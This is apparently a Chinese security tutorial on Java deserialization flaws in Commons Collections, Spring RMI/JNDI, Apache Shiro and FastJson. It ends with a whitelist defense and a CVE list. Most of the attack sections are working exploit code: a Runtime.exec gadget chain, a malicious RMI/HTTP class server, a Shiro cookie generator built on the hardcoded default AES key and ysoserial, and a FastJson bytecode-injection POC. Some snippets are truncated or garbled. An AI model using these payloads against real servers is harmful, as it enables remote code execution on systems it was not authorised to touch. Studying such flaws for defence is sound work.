Java反序列化漏洞是与java相关的漏洞中最常见的一种,也是网络安全工作者关注的重点。在 cve 中搜索关键字serialized共有174条记录,其中83条与java有关;搜索deserialized共有20条记录,其中10条与java有关。这些出现反序列化漏洞的框架和组件包括的大名鼎鼎的spring,其中还有许多Apache开源项目中的基础组件。例如Apache Commons Collections。 这些基础组件大量被其他框架或组件引用,一旦出现漏洞就会引起大面积的网络安全事故,后果非常严重。比较出名的反序列化漏洞有:
2015 – Apache Commons Collections 2016 – Spring RMI 2017 – Jackson,FastJson
反序列化漏洞总结 给出了近几年出现的反序列化漏洞。
序列化与反序列化是java提供的用于将对象进行持久化便于存储或传输的手段。 序列化 可以将对象存储在文件或数据库中,同时也可以将序列化之后的对象通过网络传输; 反序列化 可以将序列化后的对象重新加载到内存中,成为运行时的对象。
在java中,主要通过ObjectOutputStream中的writeObject()方法对对象进行序列化操作,ObjectInputStream 中的readObject() 方法对对象进行反序列化操作。需要序列化的对象必须实现@serializable接口。需要注意的是,如果被序列化或反序列化的类中存在writeObject()|readObject()方法,则在进行 序列化|反序列化 之前就会调用该方法。这通常是引起反序列化漏洞的一个重要特性。下面通过一段简单的代码认识一下java的序列化与反序列化:
public class User implements Serializable{ private int age; private String username; private String password; User(){ this.age = 10; this.username = "test"; this.password = "test"; } //在序列化之前被调用 private void writeObject(ObjectOutputStream os) throws IOException { os.defaultWriteObject(); System.out.println("readObject is running!"); } //在反序列化之后被调用 private void readObject(ObjectInputStream is) throws IOException, ClassNotFoundException { is.defaultReadObject(); System.out.println("writeObject is running!"); } @Override public String toString() { return "User{" + "age=" + age + ", username='" + username + '/'' + ", password='" + password + '/'' + '}'; } }
public static void main(String args[]) throws IOException, ClassNotFoundException { User user = new User(); //将序列化对象存储在serialize_data中 ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("serialize_data")); System.out.println("serialize"); oos.writeObject(user);//序列化 oos.close(); //存储在serialize_data中的对象反序列化 ObjectInputStream ois = new ObjectInputStream(new FileInputStream("serialize_data")); System.out.println("deserialize"); User userDeserialize = (User)ois.readObject();//反序列化 System.out.println(userDeserialize.toString()); ois.close(); } //输出结果 /* serialize readObject is running! deserialize writeObject is running! User{age=10, username='test', password='test'} */
Commons Collections是一个apache开源的集合类工具组件,在2015年爆出有反序列化漏洞。有大量的框架受到其影响。如:WebLogic,Jenkins,Jboss等。
Conmmons Collections中有一个TransformedMap ,其作用是对普通的map进行装饰,在被装饰过的map添加或者修改键值对时会首先调用其中Transformer 类的transform() 方法。TransformedMap 的构造函数可以传入单个Transformer。多个Transformer 构成的数组还可以构成执行链。听起来很复杂,下面看一下代码:
public class Main { public static void main(String[] args) throws IOException, ClassNotFoundException { //Transformer 有很多种,ConstantTransformer的作用是对于任何输入的参数都返回构造函数输入的对象 Transformer transformer = new ConstantTransformer(new Integer(3)); //普通map Map<String,String> rawMap = new HashMap<String, String>(); //装饰后的map Map map = TransformedMap.decorate(rawMap,transformer,transformer); map.put("dfd","dfsf"); //输出装饰后内容 map.forEach((k,v)->{ System.out.println(k+":"+v); }); }}//console output//3:3
从输出结果可以看出,放在rawMap 中的键值对已经被转换成了ConstantTransformer 构造函数传入的整数对象。因此我们可以利用InvokerTransformer 构造一个调用链来进行恶意命令的执行。代码如下:
public class Main { public static void main(String[] args) throws IOException, ClassNotFoundException { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}), new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"evilCmd"}) }; Transformer transformer = new ChainedTransformer(transformers); Map<String,String> rawMap = new HashMap<>(); Map map = TransformedMap.decorate(rawMap,null,transformer); map.put("aaa","bbb"); }}
其中构造了几个InvokerTransformer ,其中每一个transform()的输入分别是前一个transform() 方法的输出。因此这段代码翻译过来等价于:
此时,我们提到的Commons Collections并没有与反序列有关,也不能系统命令执行。但是由于AnnotationInvocationHandler这个类的存在,和上面的一些点结合起来,就产生了安全隐患。
class AnnotationInvocationHandler implements InvocationHandler, Serializable { private static final long serialVersionUID = 6182022883658399397L; private final Class<? extends Annotation> type; private final Map<String, Object> memberValues; private transient volatile Method[] memberMethods = null; AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) { Class[] var3 = var1.getInterfaces(); if (var1.isAnnotation() && var3.length == 1 && var3[0] == Annotation.class) { this.type = var1; this.memberValues = var2; } else { throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type."); } } private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException { GetField var2 = var1.readFields(); Class var3 = (Class)var2.get("type", (Object)null); Map var4 = (Map)var2.get("memberValues", (Object)null); AnnotationType var5 = null; try { var5 = AnnotationType.getInstance(var3); } catch (IllegalArgumentException var13) { throw new InvalidObjectException("Non-annotation type in annotation serial stream"); } Map var6 = var5.memberTypes(); LinkedHashMap var7 = new LinkedHashMap(); String var10; Object var11; for(Iterator var8 = var4.entrySet().iterator(); var8.hasNext(); var7.put(var10, var11)) { Entry var9 = (Entry); var10 = (String)var9.getKey(); var11 = null; Class var12 = (Class)var6.get(var10); if (var12 != null) { var11 = var9.getValue(); if (!var12.isInstance(var11) && !(var11 instanceof ExceptionProxy)) { var11 = (new AnnotationTypeMismatchExceptionProxy(var11.getClass() + "[" + var11 + "]")).setMember((Method)var5.members().get(var10)); } } } ... }}
有一个Map 类型的属性
readObject() 方法中调用了Map属性 的setValue()方法。
如果攻击者进行构造一个AnnotationInvocationHandler对象,其Map 属性的实际类型为TransformedMap ,并且将其中的Transformer构造为恶意调用链。那么在反序列化过程中就会执行readObject(),继而执行TransformedMap属性的setValue()方法,导致TransformedMap中值的改变,然后触发攻击者构造的恶意恶意调用链。最后产生系统命令执行的漏洞。漏洞的逻辑如下:
Deserialize -> call readObject() -> call setValue()-> call transform() -> call Runtime.exec()
JNDI在了解Spring RMI反序列化漏洞之前需要了解RMI以及JNDI这两个概念:
RMI(Remote Method Invocation) 即Java远程方法调用,一种用于实现远程过程调用的应用程序编程接口
JNDI (Java Naming and Directory Interface)是一个应用程序设计的API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口
在使用RMI注册服务时有两个较为重要的属性className和codebase url。className指明了服务的地址和名称,而codebase url指明了调用时对象的位置。一个简单的RMI注册服务如下:
xxxxxxxxxx Registry registry = LocateRegistry.createRegistry(1999); Reference reference = new Reference(“RMIObject”, “RMIObject”, ” “);//实际加载的类为 ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); registry.bind(“RMI”, referenceWrapper);//服务名称为RMI
当通过jndi的lookup()方法来查找127.0.0.1:1999/RMI服务时会加载 这个类,加载成功后会调用RMIObject的构造方法。如果构造方法中存在恶意代码,就会引起RCE。
xxxxxxxxxxprivate void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException { ois.defaultReadObject(); this.jndiTemplate = new JndiTemplate(); this.initUserTransactionAndTransactionManager(); this.initTransactionSynchronizationRegistry(); }
xxxxxxxxxx protected UserTransaction lookupUserTransaction(String userTransactionName) throws TransactionSystemException { … return (UserTransaction)this.getJndiTemplate().lookup(userTransactionName, UserTransaction.class); …}
xxxxxxxxxx反序列化 -> 调用 readObject() -> 调用 initUserTransactionAndTransactionManager() -> 调用 lookupUserTransaction() -> 调用 lookup() -> 实例化含有恶意代码的类 -> 造成命令执行
xxxxxxxxxxServerSocket serverSocket = new ServerSocket(9999);System.out.println(“Server started on port “+serverSocket.getLocalPort());while(true) { Socket socket=serverSocket.accept(); System.out.println(“Connection received from “+socket.getInetAddress()); ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream()); try { Object object = objectInputStream.readObject(); System.out.println(“Read object “+object); } catch(Exception e) { System.out.println(“Exception caught while reading object”); e.printStackTrace(); }}
xxxxxxxxxx//main: Registry registry = LocateRegistry.createRegistry(1999); Reference reference = new Reference(“RMIObject”, “RMIObject”, ” “);//实际加载的类为 ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference); registry.bind(“RMI”, referenceWrapper);//服务名称为RMI //开启http服务 HttpServer httpServer = HttpServer.create(new InetSocketAddress(8000), 0); httpServer.createContext(“/”,new HttpFileHandler()); httpServer.start();//HttpFileHandler: System.out.println(“new http request from “+httpExchange.getRemoteAddress()+” “+httpExchange.getRequestURI()); InputStream inputStream = HttpFileHandler.class.getResourceAsStream(httpExchange.getRequestURI().getPath().replace(“/”,”")); ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); while(inputStream.available()>0) { byteArrayOutputStream.write(; } byte[] bytes = byteArrayOutputStream.toByteArray(); httpExchange.sendResponseHeaders(200, bytes.length); httpExchange.getResponseBody().write(bytes); httpExchange.close();
xxxxxxxxxxprivate static String exec(String cmd) throws Exception { String sb = “”; BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); BufferedReader inBr = new BufferedReader(new InputStreamReader(in)); String lineStr; while ((lineStr = inBr.readLine()) != null) sb += lineStr + “/n”; inBr.close(); in.close(); return sb; } public RMIObject() throws Exception { String cmd=”gnome-calculator”; throw new Exception(exec(cmd)); }
xxxxxxxxxx Socket socket=new Socket(“″,9999); String jndiAddress = “rmi://”; org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager(); object.setUserTransactionName(jndiAddress); ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream()); objectOutputStream.writeObject(object); objectOutputStream.flush();//发送payload while(true) { Thread.sleep(1000); }
Apache Shiro是一个Java安全框架,有身份验证、授权、密码学和会话管理等功能。shiro官方编号为550的issue曾报出反序列化漏洞。根据官方的issue 。漏洞的出现在CookieRememberMeManager中。shiro将一个用于进行验证的类编码、加密后保存在cookie中。在需要对一个用户的身份进行鉴定时,CookieRememberMeManager会进行以下步骤:
xxxxxxxxxxprivate static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode(“kPH+bIxk5D2deZiIxcaaaA==”);
xxxxxxxxxx protected byte[] encrypt(byte[] serialized) { byte[] value = serialized; CipherService cipherService = this.getCipherService(); if (cipherService != null) { ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey()); value = byteSource.getBytes(); } return value; }
xxxxxxxxxx public DefaultBlockCipherService(String algorithmName) { … this.modeName =; … }
xxxxxxxxxxpublic void encrypt(InputStream in, OutputStream out, byte[] key) throws CryptoException { … this.encrypt(in, out, key, iv, generate);}
xxxxxxxxxxpublic T deserialize(byte[] serialized) throws SerializationException { if (serialized == null) { String msg = “argument cannot be null.”; throw new IllegalArgumentException(msg); } else { ByteArrayInputStream bais = new ByteArrayInputStream(serialized); BufferedInputStream bis = new BufferedInputStream(bais); try { ObjectInputStream ois = new ClassResolvingObjectInputStream(bis); T deserialized = ois.readObject(); ois.close(); return deserialized; } catch (Exception var6) { String msg = “Unable to deserialze argument byte array.”; throw new SerializationException(msg, var6); } } }
可以看到其中有readObject() 方法,然后可以采用Apache Commons Collections 反序列化漏洞提到的方法构造payload即可。具体流程如下:
设置cooke : rememberMe = base64编码得到的数据
xxxxxxxxxximport sysimport base64import uuidfrom random import Randomimport subprocessfrom Crypto.Cipher import AES def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', "gnome-calculator"], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS – len(s) % BS) * chr(BS – len(s) % BS)).encode() key = ”kPH+bIxk5D2deZiIxcaaaA==” mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor =, mode, iv) file_body = pad( base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertextif __name__ == ‘__main__’: payload = encode_rememberme(sys.argv[1]) with open(“/tmp/payload.cookie”, “w”) as fpw: print(“rememberMe={}”.format(payload.decode()), file=fpw)
http :8080/hello Cookie:cat /tmp/payload.cookie
User user = new User();user.setUsername("lily");user.setSex("girl");String userStr = JSON.toJSONString(user, SerializerFeature.WriteClassName);System.out.println(userStr);Object user2 = JSON.parseObject(userStr);System.out.println(user2);//output:run!{"@type":"com.knownsec.fastjson.rce.User","Sex":"girl","Username":"lily","sex":"girl","username":"lily"}run!{"username":"lily","sex":"girl","Username":"lily","Sex":"girl"}
public class User { public String Username; public String Sex; public String getUsername() { return Username; } public void setUsername(String username) { System.out.println("run!"); Username = username; } public String getSex() { return Sex; } public void setSex(String sex) { Sex = sex; }}
getTransletInstance()getTransletInstance( )newTransformer()getOutputProperties()
private Translet getTransletInstance() throws TransformerConfigurationException { try { if (_name == null) return null; if (_class == null) defineTransletClasses(); AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance(); ... return translet; } catch (InstantiationException e) { } catch (IllegalAccessException e) { } }
public class POC { public static String readClass(String cls){ ByteArrayOutputStream bos = new ByteArrayOutputStream(); try { IOUtils.copy(new FileInputStream(new File(cls)), bos); } catch (IOException e) { e.printStackTrace(); } return Base64.encodeBase64String(bos.toByteArray()); } public static void test_autoTypeDeny() throws Exception { ParserConfig config = new ParserConfig(); final String evilClassPath = "/home/lishion/IdeaProjects/springrec/target/classes/com/fastjson/rce/Test.class"; String evilCode = readClass(evilClassPath); final String NASTY_CLASS = ""; String text1 = "{/"@type/":/"" + NASTY_CLASS + "/",/"_bytecodes/":[/""+evilCode+"/"],'_name':'a.b',/"_outputProperties/":{ }," + "/"_name/":/"a/",/"_version/":/"1.0/",/"allowedProtocols/":/"all/"}/n"; System.out.println(text1); Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); } public static void main(String args[]){ try { test_autoTypeDeny(); } catch (Exception e) { e.printStackTrace(); } }}
java RMI 技术基于反序列化,其默认端口为1099。
public final class SafeObjectInputStream extends ObjectInputStream{ ... private List safeClassNames = new ArrayList(); safeClassNames.add("safeClass1"); safeClassNames.add("safeClass1"); safeClassNames.add("safeClass1"); ... protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException{ if(!safeClassNames.contains(desc.getName())){ //如果类名不在白名单中,抛出异常 throw new ClassNotFoundException(desc.getName()+" is not safe!"); } returnsuper.resolveClass(desc); } ...}
CVE-2018-0147 : vulnerability in Java deserialization used by Cisco Secure AccessControl System (ACS) prior to release 5.8 patch 9 could allow anunauthenticated, remote attacker to execute arbitrary commands on a…
CVE-2017-9844 :AP NetWeaver 7400.12.21.30308 allows remote attackers to cause adenial of service and possibly execute arbitrary code via a craftedserialized Java object in a request to metadatauploader, aka SAPS…
CVE-2017-7504 in JMS over HTTP Invocation Layer of theJbossMQ implementation, which is enabled by default in Red Hat JbossApplication Server <= Jboss 4.X does not restrict the classes for…
CVE-2017-5983 :he JIRA Workflow Designer Plugin in Atlassian JIRA Server before6.3.0 improperly uses an XML parser and deserializer, which allowsremote attackers to execute arbitrary code, read arbitrary files, o…
CVE-2017-5878 :he AMF unmarshallers in Red5 Media Server before 1.0.8 do notrestrict the classes for which it performs deserialization, whichallows remote attackers to execute arbitrary code via craftedserialize…
CVE-2017-5586 :penText Documentum D2 (formerly EMC Documentum D2) 4.x allows remoteattackers to execute arbitrary commands via a crafted serialized Javaobject, related to the BeanShell (bsh) and Apache Commons Co…
CVE-2017-15708 :n Apache Synapse, by default no authentication is required for JavaRemote Method Invocation (RMI). So Apache Synapse 3.0.1 or allprevious releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allowsre…
CVE-2017-1000353 :enkins versions 2.56 and earlier as well as 2.46.1 LTS and earlierare vulnerable to an unauthenticated remote code execution. Anunauthenticated remote code execution vulnerability allowed attackers…
CVE-2016-9299 :he remoting module in Jenkins before 2.32 and LTS before 2.19.3allows remote attackers to execute arbitrary code via a craftedserialized Java object, which triggers an LDAP query to a third-partys…
CVE-2016-7065 :he JMX servlet in Red Hat JBoss Enterprise Application Platform (EAP)4 and 5 allows remote authenticated users to cause a denial of serviceand possibly execute arbitrary code via a crafted serializ…
CVE-2016-6814 :hen an application with unsupported Codehaus versions of Groovy from1.7.0 to 2.4.3, Apache Groovy 2.4.4 to 2.4.7 on classpath usesstandard Java serialization mechanisms, e.g. to communicate between…
CVE-2016-6809 :pache Tika before 1.14 allows Java code execution for serializedobjects embedded in MATLAB files. The issue exists because Tika invokesJMatIO to do native deserialization.
CVE-2016-6793 :he DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.xbefore 1.5.7 allows remote attackers to cause a denial of service(infinite loop) and write to, move, and delete files with theperm…
CVE-2016-6501 :Frog Artifactory before 4.11 allows remote attackers to executearbitrary code via an LDAP attribute with a crafted serialized Javaobject, aka LDAP entry poisoning.
CVE-2016-6500 :nspecified methods in the RACF Connector component before inForgeRock OpenIDM and OpenICF improperly call the SearchControlsconstructor with returnObjFlag set to true, which allows remotea…
CVE-2016-6496 :he LDAP directory connector in Atlassian Crowd before 2.8.8 and 2.9.xbefore 2.9.5 allows remote attackers to execute arbitrary code via anLDAP attribute with a crafted serialized Java object, aka L…
CVE-2016-6199 in Gradle 2.12 allows remote attackers toexecute arbitrary code via a crafted serialized object.
CVE-2016-5983 :BM WebSphere Application Server (WAS) 7.0 before, 8.0 before8.0.0.13, 8.5 before, 9.0 before, and Liberty before16.0.0.4 allows remote authenticated users to execute arbit…
CVE-2016-5003 :he Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in ApacheArchiva, allows remote attackers to execute arbitrary code via acrafted serialized Java object in an ex:serializable element.
CVE-2016-4385 :he RMI service in HP Network Automation Software 9.1x, 9.2x, 10.0xbefore, and 10.1x before allows remoteattackers to execute arbitrary commands via a crafted serialized Java…
CVE-2016-4373 :he AdminUI in HPE Operations Manager (OM) before 9.21.130 on Linux,Unix, and Solaris allows remote attackers to execute arbitrarycommands via a crafted serialized Java object, related to the Apache…
CVE-2016-4372 E iMC PLAT before 7.2 E0403P04, iMC EAD before 7.2 E0405P05, iMC APMbefore 7.2 E0401P04, iMC NTA before 7.2 E0401P01, iMC BIMS before 7.2E0402P02, and iMC UAM_TAM before 7.2 E0405P05 allow remote …
CVE-2016-4369 E Discovery and Dependency Mapping Inventory (DDMi) 9.30, 9.31,9.32, 9.32 update 1, 9.32 update 2, and 9.32 update 3 allows remoteauthenticated users to execute arbitrary commands via a craftedse…
CVE-2016-4368 E Universal CMDB 10.0 through 10.21, Universal CMDB ConfigurationManager 10.0 through 10.21, and Universal Discovery 10.0 through 10.21allow remote attackers to execute arbitrary commands via a cr…
CVE-2016-3642 :he RMI service in SolarWinds Virtualization Manager 6.3.1 and earlierallows remote attackers to execute arbitrary commands via a craftedserialized Java object, related to the Apache Commons Collect…
CVE-2016-2510 :eanShell (bsh) before 2.0b6, when included on the classpath by anapplication that uses Java serialization or XStream, allows remoteattackers to execute arbitrary code via crafted serialized data,r…
CVE-2016-2170 :pache OFBiz 12.04.x before 12.04.06 and 13.07.x before 13.07.03 allowremote attackers to execute arbitrary commands via a craftedserialized Java object, related to the Apache Commons Collectionsli…
CVE-2016-2009 E Network Node Manager i (NNMi) 9.20, 9.23, 9.24, 9.25, 10.00, and10.01 allows remote authenticated users to execute arbitrary commandsvia a crafted serialized Java object, related to the Apache C…
CVE-2016-2003 E P9000 Command View Advanced Edition Software (CVAE) 7.x and 8.xbefore 8.4.0-00 and XP7 CVAE 7.x and 8.x before 8.4.0-00 allow remoteattackers to execute arbitrary commands via a crafted serializ…
CVE-2016-2000 E Asset Manager 9.40, 9.41, and 9.50 and Asset Manager CloudSystemChargeback 9.40 allow remote attackers to execute arbitrary commandsvia a crafted serialized Java object, related to the Apache Co…
CVE-2016-1999 :he server in HP Release Control 9.13, 9.20, and 9.21 allows remoteattackers to execute arbitrary commands via a crafted serialized Javaobject, related to the Apache Commons Collections library.
CVE-2016-1998 E Service Manager (SM) 9.3x before 9.35 P4 and 9.4x before 9.41.P2allows remote attackers to execute arbitrary commands via a craftedserialized Java object, related to the Apache Commons Collectio…
CVE-2016-1997 E Operations Orchestration 10.x before 10.51 and OperationsOrchestration content before 1.7.0 allow remote attackers to executearbitrary commands via a crafted serialized Java object, related tot…
CVE-2016-1986 Continuous Delivery Automation (CDA) 1.30 allows remote attackersto execute arbitrary commands via a crafted serialized Java object,related to the Apache Commons Collections library.
CVE-2016-1985 E Operations Manager 8.x and 9.0 on Windows allows remote attackersto execute arbitrary commands via a crafted serialized Java object,related to the Apache Commons Collections library.
CVE-2016-1114 :dobe ColdFusion 10 before Update 19, 11 before Update 8, and 2016before Update 1 allows remote attackers to execute arbitrary commandsvia a crafted serialized Java object, related to the Apache Com…
CVE-2016-10304 :he SAP EP-RUNTIME component in SAP NetWeaver AS JAVA 7.5 allowsremote authenticated users to cause a denial of service (out-of-memoryerror and service instability) via a crafted serialized Java obj…
CVE-2016-0958 :dobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 might allow remoteattackers to have an unspecified impact via a crafted serialized Javaobject.
CVE-2016-0276 :BM Financial Transaction Manager (FTM) for ACH Services forMulti-Platform and 3.0.0.x before fp0013, FinancialTransaction Manager (FTM) for Check Services for Multi-Platform2.1.1.2 and 3.0…
CVE-2015-8765 :ntel McAfee ePolicy Orchestrator (ePO) 4.6.9 and earlier, 5.0.x,5.1.x before 5.1.3 Hotfix 1106041, and 5.3.x before 5.3.1 Hotfix1106041 allow remote attackers to execute arbitrary code via a crafte…
CVE-2015-8360 :n unspecified resource in Atlassian Bamboo before 5.9.9 and 5.10.xbefore 5.10.0 allows remote attackers to execute arbitrary Java codevia serialized data to the JMS port.
CVE-2015-8103 :he Jenkins CLI subsystem in Jenkins before 1.638 and LTS before1.625.2 allows remote attackers to execute arbitrary code via acrafted serialized Java object, related to a problematicwebapps/ROOT/W…
CVE-2015-7501 :ed Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; DataGrid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; EnterpriseApplication Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service …
CVE-2015-7450 :erialized-object interfaces in certain IBM analytics, businesssolutions, cognitive, IT infrastructure, and mobile and socialproducts allow remote attackers to execute arbitrary commands via acraft…
CVE-2015-6934 :erialized-object interfaces in VMware vRealize Orchestrator 6.x,vCenter Orchestrator 5.x, vRealize Operations 6.x, vCenter Operations5.x, and vCenter Application Discovery Manager (vADM) 7.x allow …
CVE-2015-6420 :erialized-object interfaces in certain Cisco Collaboration and SocialMedia; Endpoint Clients and Client Software; Network Application,Service, and Acceleration; Network and Content Security Devices…
CVE-2015-5348 :pache Camel 2.6.x through 2.14.x, 2.15.x before 2.15.5, and 2.16.xbefore 2.16.1, when using (1) camel-jetty or (2) camel-servlet as aconsumer in Camel routes, allow remote attackers to execute arbi…
CVE-2015-5344 :he camel-xstream component in Apache Camel before 2.15.5 and 2.16.xbefore 2.16.1 allow remote attackers to execute arbitrary commands viaa crafted serialized Java object in an HTTP request.
CVE-2015-5254 :pache ActiveMQ 5.x before 5.13.0 does not restrict the classes thatcan be serialized in the broker, which allows remote attackers toexecute arbitrary code via a crafted serialized Java Message Serv…
CVE-2015-4852 :he WLS Security component in Oracle WebLogic Server,,, and allows remote attackers to executearbitrary commands via a crafted serialized Java object in T3 protoco…
CVE-2015-3253 :he MethodClosure class in runtime/ in Apache Groovy1.7.0 through 2.4.3 allows remote attackers to execute arbitrary codeor cause a denial of service via a crafted serialized objec…
CVE-2015-2828 :A Spectrum 9.2.x and 9.3.x before 9.3 H02 does not properly validateserialized Java objects, which allows remote authenticated users toobtain administrative privileges via crafted object data.
CVE-2015-0225 :he default configuration in Apache Cassandra 1.2.0 through 1.2.19,2.0.0 through 2.0.13, and 2.1.0 through 2.1.3 binds an unauthenticatedJMX/RMI interface to all network interfaces, which allows rem…
CVE-2014-9757 :he Ignite Realtime Smack XMPP API, as used in Atlassian Bamboo before5.9.9 and 5.10.x before 5.10.0, allows remote configured XMPP serversto execute arbitrary Java code via serialized data in an XM…
CVE-2014-7911 :uni/src/main/java/java/io/ in implementation in Android before 5.0.0 doesnot verify that deserialization will result in an object that met thereq…
CVE-2013-5960 :he authenticated-encryption feature in the symmetric-encryptionimplementation in the OWASP Enterprise Security API (ESAPI) for Java2.x before does not properly resist tampering with seriali…
CVE-2013-5679 :he authenticated-encryption feature in the symmetric-encryptionimplementation in the OWASP Enterprise Security API (ESAPI) for Java2.x before 2.1.0 does not properly resist tampering with serialize…
CVE-2013-4271 :he default configuration of the ObjectRepresentation class in Restletbefore 2.1.4 deserializes objects from untrusted sources, which allowsremote attackers to execute arbitrary Java code via a seri…
CVE-2013-2165 in the RichFaces 3.x through 5.ximplementation in Red Hat JBoss Web Framework Kit before 2.3.0, RedHat JBoss Web Platform through 5.2.0, Red Hat JBoss EnterpriseApplication…
CVE-2013-0441 :nspecified vulnerability in the Java Runtime Environment (JRE)component in Oracle Java SE 7 through Update 11, 6 through Update 38,5.0 through Update 38, and 1.4.2_40 and earlier, and OpenJDK 6 and…
CVE-2012-4858 :BM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 beforeIF2, 10.1.1 before IF2, and 10.2 before IF1 does not properly validateJava serialized input, which allows remote attackers to execu…
CVE-2009-1094 :nspecified vulnerability in the LDAP implementation in Java SEDevelopment Kit (JDK) and Java Runtime Environment (JRE) 5.0 Update 17and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.1_24 andea…
CVE-2005-3583 :1) Java Runtime Environment (JRE) and (2) Software Development Kit(SDK) 1.4.208, 1.4.209, and 1.5.0_05 and possibly other versionsallow remote attackers to cause a denial of service (JVM unrespon…
CVE-2004-2540 :eadObject in (1) Java Runtime Environment (JRE) and (2) SoftwareDevelopment Kit (SDK) 1.4.0 through 1.4.2_05 allows remote attackersto cause a denial of service (JVM unresponsive) via crafted seria…
Common Vulnerabilities and Exposures
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